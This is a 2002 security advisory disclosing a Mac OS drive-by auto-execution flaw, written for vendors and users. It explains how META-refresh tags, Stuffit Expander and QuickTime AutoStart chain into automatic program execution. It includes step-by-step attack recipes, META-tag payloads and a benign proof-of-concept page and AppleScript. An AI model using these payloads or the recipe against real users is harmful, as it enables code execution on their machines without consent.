Last modified : 2002.02.14 21:20

Auto file execution vulnerability in Mac OS

vm_converter <vm_converter@mac.com> : http://homepage.mac.com/vm_converter/
FUJII Taiyo <taiyo@vinet.or.jp> : http://www.u-struct.com/

We found a vulnerability in Mac OS and Mac OS X with Classic environment. So, we have reported it for related vendors, browsers and Aladdin Systems, Inc. and Apple Computer, inc. in Feb. 3.

In this document, we provide URL to test exploit using this vulnerability.

[ Overview ]

If a victim-user only browses a malicious web-page;
  1. Browsers start automatically download a compressed disc-image file which includes a malicious program.
  2. Archivers --such like Stuffit Expander-- automatically expand the compressed file, and mount the disc-image.
  3. Mac OS (QuickTime) executes the malicious program included in the disc-image. It depends on QuickTime settings.
These 3 processes are done full-automatically, and end in an instant.

[ Detail ]

The vulnerability which we found is based on 3 vulnerabilities, and is generated by many software's complex relations. To explain the vulnerability, we summarize these 3 vulnerabilities in below.

-- Vuln.1 (announced at Bugtraq) : Macinosh IE file execuion vulerability

The first one is Macinosh IE file execuion vulerability [BugTraq] 2002 Jan.22 from Jass Seljamaa.

This vulnerability is observed when the web pages in which META-tag mentioned below is used are browsed.
<META HTTP-EQUIV="refresh" CONTENT="1; URL=file:///Macintosh%20HD/System%20Folder/Speakable%20Items/Put%20Computer%20To%20Sleep">

This means, malicious users can execute local programs in Macintosh using web pages. But it's able to only execute programs exist in full file-path in Macintosh which known by malicious users.
(In above case, Put Computer To Sleep lies in Macintosh HD:System Folder:Speakable Items:Put Computer To Sleep is executed.)

-- Vuln.2 (probably announced in Japan only) : Force-download by META-tag

Next day to Vuln.1 is reported, a Japanese user, Mr. Mori presents other vulnerability related to Vuln.1 at "Security Hole memo".

- http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2002/01.html#20020123_macie (written in Japanese)

This vulnerability, similar to Vuln.1, is observed when the web pages in which META-tag mentioned below is used are browsed.
<META HTTP-EQUIV="refresh" CONTENT="1;URL=http://somewhere.com/someone.sit">
Ater these pages are browsed, malicious programs are downloaded automatically.
So, malicious users use combination of Vuln.1 and Vuln.2 can force victims to download the program and execute it. But, to force to execute the program, the malicious users must know the full file-path of download folders in victims' Macintosh.

-- Vuln.3 (we found, probably announced in Japan only) : The technique using the disk image

According to Vuln.1 and 2, we found other vulnerability, malicious users can launch arbitrary programs without to know full file-path.

Step 1 : Make a disk image that contains malicious program.
Step 2 : Compress this disk image file in *.sit form. (*.hqx, *.bin also effective)
Step 3 : Upload this *.sit file to some website and prepare a web page using Vuln.1 and 2
Step 4 : Victims browse the web page the *.sit file is downloaded automatically. *
Step 5 : Stuffit Expander automatically extracts the *.sit file and mounts the disk image.
Step 6 : The malicious program in the disk image is executed automatically by browsers. *

* : Step 4 is based on Vuln.2 and Step 6 is based on Vuln.1.

Because of using disk image, malicious users are free to file-path of download folder. It's necessary to only prepare malicious programs and web pages.
In this vulnerability, Stuffit Expander plays an important role. It does automatic extraction and auto-mount disk images. So, in consists of Vuln.1, browsers execute the program. We make a test page for this vulnerability. Please try it.
http://www.u-struct.com/diary/img/20020126_IE5issue_noJS/

Auto file execution vulnerability in Mac OS : The technique using "AutoStart"

According to Vuln.1 to Vuln.3, we explain the "Auto file execution vulnerability in Mac OS".
This vulnerability which we found uses Vuln.2 and 3 but Vuln.1. It is coused by many software's complex relations, such as browsers (and network-clients) and Stuffit Expander and QuickTime. It's like the computer-virus "AutoStart9805" using "Autostart CD-ROMs" of QuickTime. In this way, similar to Vuln.3, malicious users can launch arbitrary programs without to know full file-path.

Step 1 : Make a disk image that contains "autostart" malicious program.
Step 2 : Compress this disk image file in *.sit form. (*.hqx, *.bin also effective)
Step 3 : Upload this *.sit file to some website and prepare a web page using Vuln.2.
Step 4 and 5 is same as Vuln.3.
Step 6 : The program in the image is executed automatically by "Autostart CD-ROMs" of QuickTime.

In this vulnerability,
1. browser downloads the *.sit in consists of Vuln.2.
2. then, Stuffit Expander does automatic extraction and auto-mount the disk image.
3. and then, QuickTime executes the program in the image.
These are initial settings of each one. It's a teamwork. Only needs one click in web page, It will start automatic download, extraction, mounting, and execution.
Furthermore, if victims manually download malicious disk image with browsers or other network clients (like Fetch via FTP), automatic extraction, mounting, execution will start.

[ Exploit ]

We make a test page for this vulnerability. Please try it.
http://www.u-struct.com/diary/img/20020131_OSissue_E/

When your conditions are fulfilled, "Exploit_HD_OSX.img.sit" is downloaded and extracted, and disk image "Exploit_HD_OSX" is mounted, and application "openTrash" is launched automatically.
"openTrash" is application that prompt "This application opens trash only" and open trash only.

- web page source
<HTML>
<HEAD>
<META HTTP-EQUIV="refresh" CONTENT="1;URL=http://www.u-struct.com/diary/img/20020131_OSissue/Exploit_HD_OSX.img.sit">
</HEAD>
<BODY>
 

When your conditions are fulfilled, "Exploit_HD_OSX.img.sit" is downloaded and extracted, and disk image "Exploit_HD_OSX" is mounted, and application "openTrash" is launched automatically.

<h4>Vulnerable conditions</h4>

<b>In Mac OS :</b>
<ul>
<li>"QuickTime setting" control panel > "Autostart CD-ROMs" is ON.<br>
<li>Stuffit Expander > preferences > Disk images > "Mount Disk Images" is ON.<br>
<li>Stuffit Expander > preferences > Expanding > "Continue to expand"  is ON.<br>
<li>Each Browsers > each preference > download setting using Stuffit Expander in post-process.<br>
<li>Each Browsers > each preference > download setting is "enable"<br>
</ul>

<b>In Mac OS X with Classic environment :</b>
<ul>
<li>Classic's "QuickTime setting" control panel > "Autostart CD-ROMs" > is ON.*<br>
<li>Others are same as in Mac OS.<br>
* "Autostart CD-ROMs" is influenced with Classic's "QuickTime setting". So, when Classic environment is not booted, Mac OS X is not affected.
</ul>


</BODY>
</HTML>
- "openTrash" source (AppleScript)
display dialog "this application opens your Trash only."
		
tell application "Finder"
	open trash
	activate
end tell

[ Solutions ]

Change the initial settings of each ones below.
The solutions are divided into two part, "required settings" and "more secure settings (not required)".

++ required settings ++
These are the solutions to prevent execution of malicious programs, but are not for Vuln.2 (force-download). However we recommend strongly all users to perform.
We recommend strongly that "required settings" is performed, but please choose each solutions according to convenience and your environment. ++ more secure settings (not required) ++
The following is a list of solutions effective in either of the four above-mentioned ulnerabilities. Please choose ones according to your judgement.

[Vendor status]

- mozilla.org (Bugzilla)
They set our report as "security sensitive".
http://bugzilla.mozilla.org/show_bug.cgi?id=123152

- icab.de
A Japanese iCab user (not us) has already reports to icab.de already.
They reply for solutions, and have expressed correspondence.
(But there is no infomation about it in their web site now.)

- microsoft.com and microsoft.co.jp
They have expressed correspondence to Vuln.1
(But there is no infomation about it in their web site now.)

- other vendors
no reply or auto reply

[Our comment]

We've reported to related vendors* at Feb.3, and contribute this vulnerability to BugTraq regardless of vendor correspondence.
Because we already announce this vulnerability in Japan, at our web-site and Security Hole memo ML.
Probably, thousands of Japanese users already know this vulnerability.

(these are in Japanese Language)
http://www.u-struct.com/diary/view.cgi?ID=s20020128002516
http://homepage.mac.com/vm_converter/200202_diary.html#20020128_AutoStart_vuln
http://memo.st.ryukoku.ac.jp/archive/200202.month/2846.html

*:apple.com, apple.co.jp, microsoft.com, microsoft.co.jp, aladdinsys.com, act2.co.jp, netscape.com, netscape.co.jp, mozilla.org (Bugzilla), icab.de, omnigroup.com, opera.com.

[Thanks]

First of all, Thanks to Jass Seljamaa for his contribution at Bugtraq.

Next, for Vuln.2, thanks to Mr. Mori for his contribution, and to Mr. Kojima for his information disclosure at "Security Hole memo".

And special thanks to all who offered the information on solutions and verifications, Rj, Mr. Nishitani, A8, Alchemist, Mr. Shinoda (for his verification of many browsers at [memo:2782]), gururi, KANKICHI, Mr. Sugisaki (for his infomation of QuickTime at [memo:2848]), Mr. Kobayashi, Mr. Takeuchi (iCab Japanese Edition), Ray, and all of the contributors to BBS at iCab wo kiwameru,

Also, special thanks to all who gave advice, awacs@hawkeye, Mr. Katayama, Mr. Akiyama (Macintosh Trouble News (Macintosh News) ), all of the contributors to Tea Room for Conference at academic office, and Kyodai-FUJI-Taiin.